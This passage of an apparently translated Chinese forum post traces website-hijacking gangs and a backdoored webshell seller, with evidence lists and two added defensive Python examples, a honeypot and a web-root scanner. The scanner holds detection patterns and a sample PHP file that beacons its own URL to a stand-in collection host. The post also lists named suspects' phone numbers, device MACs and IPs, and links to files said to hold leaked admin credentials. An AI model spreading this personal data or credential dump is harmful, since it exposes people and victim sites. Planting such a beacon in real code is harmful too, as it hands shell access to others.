kept insisting I was the Xingji team, and blocked me. Later I proactively added him and said: you're from Hebei, right? I already have evidence of your crimes. That scared him; he added me back, caved, and even sent me a packaged bundle of webshells. That stunned me all over again; it was simply off the charts: tens of thousands of webshells plus backend login passwords for every CMS in the country, including dedecms, discuz, wordpress, emlog, ecshop, empire, jieqi, phpmyadmin, uchome, ucenter, php168 and more; almost every CMS used in the country is represented, and each type runs to over ten thousand entries after deduplication. I will upload a portion in the attachment. He said the people behind him have several hundred thousand Discuz backend login accounts and passwords. I tested some of the backends he sent me and could log into all of them; the information includes the login formhash, uid, username, password, security question and security answer, and all of it was from the previous day...</p>
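    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The honeypot trick used twice above (section II, step 1, and the phishing-for-evidence step here) reduces to a very small server. What follows is an added example, not the post's own stub: it answers at a retired shell path with a page carrying the lure text, the page beacons the visitor's screen size, timezone and language back to the same path, and the server logs source IP, User-Agent and beacon in the "time ( IP x ) platform, resolution" shape the evidence lists below use. The shell path, the lure text, the in-memory log and the form-encoded beacon are assumptions of this example; the post's version also pulled logged-in identity from other sites' JSON endpoints, which this does not reproduce.</p>

```python
"""Honeypot at a retired webshell path.

Added example, not the original post's stub. Serves a lure page at the old
shell URL, accepts a form-encoded beacon from it, and logs visitors in the
"time ( IP x ) platform, resolution" shape the post's evidence lists use.
SHELL_PATH, LURE and the in-memory HITS store are assumptions.
"""
import io
import time
from urllib.parse import parse_qs
from wsgiref.simple_server import make_server

SHELL_PATH = "/uploads/avatar/1.gif"   # assumed: where the shell used to live
LURE = "add me email:xxx@xxx.com I will give you all webshell"
HITS = []                              # a real deployment appends to a file instead

LURE_PAGE = """<html><body><pre>{lure}</pre>
<script>
fetch("{path}", {{method: "POST",
  headers: {{"Content-Type": "application/x-www-form-urlencoded"}},
  body: "w=" + screen.width + "&h=" + screen.height
      + "&tz=" + (-new Date().getTimezoneOffset()) + "&lang=" + navigator.language}});
</script></body></html>"""


def client_ip(environ):
    """First X-Forwarded-For hop when behind a reverse proxy, else the socket peer.
    X-Forwarded-For is attacker-controllable; trust it only behind your own proxy."""
    xff = environ.get("HTTP_X_FORWARDED_FOR")
    return xff.split(",")[0].strip() if xff else environ.get("REMOTE_ADDR", "?")


def record(environ, beacon=None):
    """Append one visit (and the beacon, if any) to the log."""
    hit = {"time": time.strftime("%Y-%m-%d %H:%M:%S"), "ip": client_ip(environ),
           "ua": environ.get("HTTP_USER_AGENT", ""), "beacon": beacon or {}}
    HITS.append(hit)
    return hit


def format_hit(hit):
    """Render one hit like the post's evidence lines."""
    b = hit["beacon"]
    res = f"{b['w']}x{b['h']}" if "w" in b and "h" in b else "?"
    return f"{hit['time']} ( IP {hit['ip']} ) {hit['ua']}, {res}, tz={b.get('tz', '?')}"


def app(environ, start_response):
    """WSGI app: 404 everywhere except the old shell path."""
    if environ.get("PATH_INFO") != SHELL_PATH:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]
    if environ["REQUEST_METHOD"] == "POST":          # the page's beacon
        length = int(environ.get("CONTENT_LENGTH") or 0)
        form = parse_qs(environ["wsgi.input"].read(length).decode("latin-1"))
        record(environ, {k: v[0] for k, v in form.items()})
        start_response("204 No Content", [])
        return [b""]
    record(environ)                                   # first contact: log, then serve the lure
    body = LURE_PAGE.format(lure=LURE, path=SHELL_PATH).encode("utf-8")
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [body]


def simulate(method, path, headers=None, body=b""):
    """Drive app() without a socket: build a WSGI environ, return (status, body)."""
    environ = {"REQUEST_METHOD": method, "PATH_INFO": path,
               "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
    environ.update(headers or {})
    out = {}
    chunks = app(environ, lambda status, hdrs: out.setdefault("status", status))
    return out["status"], b"".join(chunks)


if __name__ == "__main__":
    print(f"honeypot listening on :8080{SHELL_PATH}")
    make_server("", 8080, app).serve_forever()
```

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">simulate() exercises the app offline; running the file serves it for real on port 8080 behind whatever proxy terminates the original site. The beacon is only sent by a visitor whose browser executes the page, so a curl-style probe by the shell buyer leaves just the IP and User-Agent line, which is still the pairing the evidence section relies on.</p>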
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">What on earth could record so much without the slightest anomaly? Among it I saw many sites where I had used a big shell; it also contained over ten thousand webshells, among them a large number of my sites, plus a large number of big shells of all kinds with different passwords. Apparently I am not the only victim: by signature matching I counted no fewer than a hundred distinct big-shell signatures. And what he sent me was only a very small part; he wanted money before giving me more. Thinking about it that way, the resources in his hands must run to several hundred thousand entries. He said the people behind him are a technical team with all kinds of 0days, working for the state and holding the webshells of the whole country. If the resources were really as he described, why would they turn up in his hands and be put up for sale? He was obviously lying out of fear that I would investigate him. The investigation continued.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">After several days of analysis, this batch of data is the same as the "nine-square grid" (九宫格) that wooyun exposed earlier (you can look back at the 2013 case of <a style="color: black;">http://www.dedebox.com/core/centerxxxxx.php</a>). I packaged and analyzed the data from that time as well, and found that this batch of shells still contains some of the same data; moreover the login parameter signature of the current big shell matches that of the nine-square grid: basically all of them are modified from the Spider PHP Shell (SPS-) code. In other words, apart from the backdoor itself, this crew extracts large numbers of webshells through some other channel, then uses the webshells to run code that records backend data, written into memory as zombie code that stays alive for years as long as the server is not replaced. This is still conjecture, because some of the sites in the backend data really are duplicates of the nine-square grid; if it is the nine-square-grid backdoor I would have a new direction to investigate. That is the rough course of my analysis and investigation. Below I will not describe the process; it was too complicated and took several months, and the people involved all have information that could be followed up, so I will simply provide the data records and the evidence results, which is what was handed to the police.</p><span style="color: black;"><strong style="color: blue;">×IV. Evidence</strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">How can such rampant black-market crime still exist in today's China (telecom fraud aside)? They must all be brought to justice.</p><span style="color: black;">These are the domains gang one (Lao Yuan) redirected to</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">116305.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">559160.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">618309.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">786077.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">551809.com</p><a style="color: black;">www.919808.net</a><a style="color: black;">www.226830.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">All belong to the same gang; only the domains differ. The IP in the hijack code is the same everywhere, 107.182.228.74; each site merely redirects to a different domain to spread the risk. Clearly very seasoned.</p><span style="color: black;">These are the IPs of the addresses serving the BC logo images in the hijacked content fed to simulated spider crawls</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">210.126.27.70</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">pic.root1111.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">58.96.179.132</p>104.202.66.226<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">This gang's working-environment IPs, all in Malaysia (between 9 and 26 October)</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:00:01 ( IP 14.192.210.34 ) Malaysia, Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:20:09 ( IP 103.6.245.143 ) Malaysia, Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:00:25 ( IP 175.141.34.101 ) Malaysia, Windows NT 6.3, Chrome 50.0.2661, QQBrowser 9.5.9244, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-24 13:59:17 ( IP 175.136.41.251 ) Malaysia, Windows 7 &amp; 2008 r2, MSIE 49.0, Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-25 14:28:11 ( IP 175.143.101.241 ) Malaysia, Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">14.192.211.116&nbsp;&nbsp;Malaysia</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">14.192.211.223 Malaysia</p>175.138.234.137 Malaysia<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Working PC fingerprints (analysis suggests this gang has 5 people):</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, MSIE 11.0, QQBrowser 9.5.9244, 1920×1080, 2^24 colors</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows 7 &amp; 2008 r2, MSIE 49.0, Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows XP, MSIE 6.0, 1126×800</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows Server 2003, Chrome 49.0.2623, 1920×1080</p>Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">Information on this gang's leader</span></strong>
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ 474304849 641075512</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">真实姓名:袁立 重庆人</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">手机号:15998984721&nbsp;&nbsp;手机MAC:18:9E:FC:11:2C:70&nbsp;&nbsp;马来西亚手机号:060136958999</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">His websites:</p><a style="color: black;">www.badongedu.com</a>
    <a style="color: black;">www.7cq.tv</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(the regional forum he founded)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">
      api.fwqadmin.com (this is the collection address for the backdoor he left in the big shell he himself is currently using); the attachment includes a big-shell sample for anyone interested</p>Email:root@7cq.tv <a style="color: black;">pianziso@163.com</a><span style="color: black;">Historical IPs in China:</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.178.225.146 (Chongqing, China Telecom)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">222.178.201.12 (Chongqing, China Telecom)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">27.11.4.19 (Chongqing, China Unicom)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">27.10.36.56 (Chongqing, China Unicom)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">113.204.194.202 (Chongqing, China Unicom)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">119.84.66.14 (Chongqing, China Telecom)</p>61.161.125.77 (Banan District, Chongqing; 时代e行线网迷俱乐部 internet café, Lijiatuo branch, halls A/B)<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Historical PC information in China:</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">MAC: 90-2b-34-93-ad-73</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Operating system: Microsoft Windows XP</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Graphics card: NVIDIA GeForce GT 610</p>CPU: AMD Athlon(tm) II X4 640 Processor 3325HZ<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">I did not go on to investigate the other gang members; finding him is enough.</p><strong style="color: blue;"><span style="color: black;">WebShell seller (一切安好) information</span></strong><span style="color: black;">VPN proxies:</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">110.10.176.127&nbsp;&nbsp;South Korea</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-24 22:26:37 ( IP 211.110.17.189 ) South Korea</p>(a host he set up himself, bought with bitcoin) accessed on 9 October<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Real:</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 16:23:27 ( IP 121.18.238.18 ) Baoding, Hebei; China Unicom CDN node of Shanghai Wangsu (网宿) Science &amp; Technology Co., Ltd.; Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>27.186.126.196 Baoding, Hebei, China Telecom&nbsp;&nbsp;more likely to be the real IP<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Browser fingerprint information: three different ones in total, but they should all be the same person, who probably has several computers, since he has two QQ accounts</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, Chrome 45.0.2454, 1366×768 (real fingerprint)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, Chrome 45.0.2454, 1366×768, 2^24 colors, Alexa toolbar not installed</p>Windows NT 10.0, Chrome 53.0.2785, 1600×900, 2^24 colors,<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ2436449670&nbsp;&nbsp;3496357182</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">This person now drives an Audi A8, a real tycoon; it seems he has made a lot of money and is still at large. He has a Hebei accent, so he is from Hebei.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">To trace where the webshells came from, the only route is to investigate who is behind him.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">His transaction records with Lao Yuan:</p>
    <img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmicrdIzaF1HOvM9JVYiaTibLXDSh03bYoP1m1Jf1qxY8LszMlmeu33ISFQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmInK7wOhvOEAuxEaXpsEG6BThKu1veySgYO87dXOHQvkEGCtuRp6RsA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Xingji (星际) group information</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Domains they have used:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">htt p://www.woyaotupianhehe.com/img/20151106/lq.rand(2,20).".jpg</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2 to 20 are all their logos; once Baidu indexes the page they show up, which is why there are so many images like the 80268.com one</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Stats code</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">By analysing the login records in the stats code on their sites, the Malaysian IPs are the real IPs.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Searching the major search engines for crawled pages that redirect to their sites, and for the snapshot signatures, turned up more than 1000 sites they have hijacked, including some of the country's largest news sites such as ifeng.com and china.com.cn; if the police need it I can provide the list.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The Xingji hijacking group is in Malaysia, with roughly 6 members. Their intrusion methods include but are not limited to spear phishing, social engineering, brute forcing and 0-days; they crawl for vulnerabilities and break in in bulk, and after each intrusion they like to leave large numbers of backdoors so they do not lose access.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Division of roles:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Two core technical penetration members (one mainly responsible for attacks, breaking into large news sites; one mainly responsible for code auditing and a series of internal PHP development including the hijack program, who also breaks into some medium-weight sites)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">One ordinary technical penetration member (breaks into the low-value sites that the scanner finds vulnerable)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Two responsible for planting the hijack code, and restoring it if a site is lost</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">One responsible for the market and finance side of the BC (gambling) sites: receiving and paying out money, and buying sites</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The core members returned from Malaysia to China in December 2015 and went back to Malaysia around February 2016</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The above is what I learned through people in the scene using some methods; because this group's security awareness is fairly high I did not get much real information, but a hacker who once did outsourced work for them can be followed up the chain</p>

<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The famous female hacker: YingCracker</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Finding this female hacker to learn about the group's situation should make progress</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Their backdoor samples:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Some of them I copied straight into the folder</p>

<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Suspects behind the collection-box address</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">This incident has the same characteristics as the Jiugongge (九宫格) case, so I went back over the 2013 incident and investigated this person in depth; two people can be identified, and it was certainly one of them.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Even if the 大马 (big webshell) is not the problem, the inside story of this backdoor incident can still be learned from these two people; the only uncertainty is that the box's 大马 shows no visible problem. The reason is that the data is far too similar to their earlier backdoor data: it covers almost every CMS, and some of the recorded admin panels are ones from the Jiugongge box that was broken into years ago, which is still recording new entries to this day</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Suspect one: the former T00ls member spider, founder of the spider 大马. He left backdoors back then too; tracing it back it all dates to 2011. The investigation shows that the 大马 shells he released publicly at that time already contained backdoors, and he himself made heavy use of them for game hijacking and SEO trojans; rumour has it he had made several million by 2012, after which he went quiet, dropped out of public view and vanished from the scene. The current investigation has a new finding, however: he has remained active, logged into his old mailbox this year and renewed the collection domain for the backdoor, because he cannot change the domain; if he did, he would stop receiving shells.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Historical IPs (possibly already outdated)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Suspect two:</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">A well-known figure in the scene: toby57. I have dealt with him before; he said he was working for the state, so he does not seem much like the mastermind of this affair, but the owner of the dedebox.com domain is him, and he is capable enough to do something like this</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">His 163.com mailbox is also the IM he uses most</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Historical IPs</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Because the characteristics of the dedebox.com collection program resemble suspect one's, it is not possible to tell which of the two actually did it, so both need to be dug into.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">×5. Conclusion</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">For now there is actually no conclusion. Where all of the country's 大马 shells, the admin panels of the major CMSes and the webshell backdoors leaked from remains a mystery, because my skills are too weak... But I believe the police can solve it; you have enough authority and duty to carry out the crackdown. Otherwise the harm to ordinary users is too great: webshells taken to run gambling and fraud do enormous damage, the black-hat SEO behind almost the whole gambling industry and the whole fraud industry originates here, and if it is not stopped promptly the harm will keep growing without limit.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Also, to see the compromised sites, go to 360 Search and look at the newest day's indexed results for "娱乐场" (casino)</p><a style="color: black;">https://www.so.com/s?q=%E5%A8%B1 ... new</a>home&amp;adv_t=d
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Friendly reminder: anyone who has ever used any 大马 should take care to check their own shell and see whether the file timestamps inside it have all been set uniformly to a recent creation time</p>
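<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The timestamp check in the reminder above, together with the hijack program's rand(2,20) logo fetch described earlier, as a defender-side scan over a web root. This is an added example, not code from the post or its author; the sample PHP files, the logo.example and box.example hosts, and the "beacon" heuristic for the collection backdoor are constructed assumptions.</p>

```python
import os
import re
import tempfile
import time

# rand(2,20) is the hijack program's random-logo feature the post describes; eval over a
# decoded blob is a standard webshell marker; the beacon heuristic (outbound HTTP fetch in
# a file that also reads its own host/URI from $_SERVER) is an assumption, not post code.
RAND_LOGO = re.compile(r"rand\(\s*2\s*,\s*20\s*\)")
EVAL_DECODE = re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(")
OUTBOUND = re.compile(r"(?:file_get_contents|curl_setopt)\s*\([^;]*https?://", re.S)
SELF_URL = re.compile(r"\$_SERVER\s*\[\s*['\"](?:HTTP_HOST|SERVER_NAME|REQUEST_URI)")

def file_indicators(text):
    """Indicator names that match one PHP file's source text."""
    hits = [name for name, rx in (("random_logo_fetch", RAND_LOGO),
                                  ("eval_decoded_payload", EVAL_DECODE)) if rx.search(text)]
    if OUTBOUND.search(text) and SELF_URL.search(text):
        hits.append("shell_url_beacon")
    return hits

def mtime_cluster(paths, window):
    """(size, start) of the largest group of files whose mtimes lie within `window` seconds."""
    times = sorted(os.path.getmtime(p) for p in paths)
    best, start, j = 0, None, 0
    for i, t in enumerate(times):
        while t - times[j] > window:  # slide the window's left edge forward
            j += 1
        if i - j + 1 > best:
            best, start = i - j + 1, times[j]
    return best, start

def scan_webroot(root, window=600, min_cluster=3):
    """Indicator hits per PHP file, plus any batch of >= min_cluster files written together."""
    php = [os.path.join(d, f) for d, _, fs in os.walk(root) for f in fs if f.lower().endswith(".php")]
    hits = {}
    for p in php:
        with open(p, encoding="utf-8", errors="replace") as fh:
            found = file_indicators(fh.read())
        if found:
            hits[os.path.relpath(p, root).replace(os.sep, "/")] = found
    size, start = mtime_cluster(php, window)
    cluster = None if size < min_cluster else {"files": size, "of": len(php), "start": start}
    return {"hits": hits, "mtime_cluster": cluster}

def build_sample_site():
    """Constructed sample web root: two old clean files and three files planted in one batch."""
    root = tempfile.mkdtemp(prefix="webroot_")
    planted = time.time() - 3600          # made-up timestamps for the example
    old = planted - 400 * 86400
    samples = {
        "index.php": ("<?php include 'functions.php'; echo page(); ?>", old),
        "functions.php": ("<?php function page() { return 'hello'; } ?>", old),
        "x.php": ("<?php $u = 'http://logo.example/img/' . rand(2,20) . '.jpg'; "
                  "echo file_get_contents($u); ?>", planted),
        "cache.php": ("<?php eval(base64_decode('ZWNobyAxOw==')); ?>", planted),
        "shell.php": ("<?php $me = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; "
                      "@file_get_contents('http://box.example/?u=' . urlencode($me)); ?>", planted),
    }
    for name, (body, mtime) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return root
```

Run scan_webroot on a real document root with a window of a few minutes; a cluster covering most of the directory, combined with any indicator hit, is the pattern the post warns about.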
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">PS: because my browser has no Flash installed I cannot upload attachments or images, so please download the attached document to see the complete images and the webshell list in the attachment.</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Link: <a style="color: black;">https://1drv.ms/u</a>/s!AhMf1bUbIk7UanjRbtWlwOyebhU</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Partial list of victim domains (this base is just over 10,000 entries after de-duplication, roughly 200,000 before; the information in it matches the attachment: for each site it records every administrator login account and password, including whether a webshell is present)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Link: <a style="color: black;">https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZ</a>XZuVMX3fw</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Once you have the victim list you can search it for the domains of the webshells you hold; if one is present, take care to get rid of the 大马 promptly so that criminals cannot use it to cause you harm.</p>




nykek5i posted on 2024-10-21 20:52:06

It is the way things are going; the phrase is used to mock works made purely to ride a trend, play with memes and grab attention.

4lqedz posted 3 days ago

This article really taught me a lot; external link posting, thanks for sharing!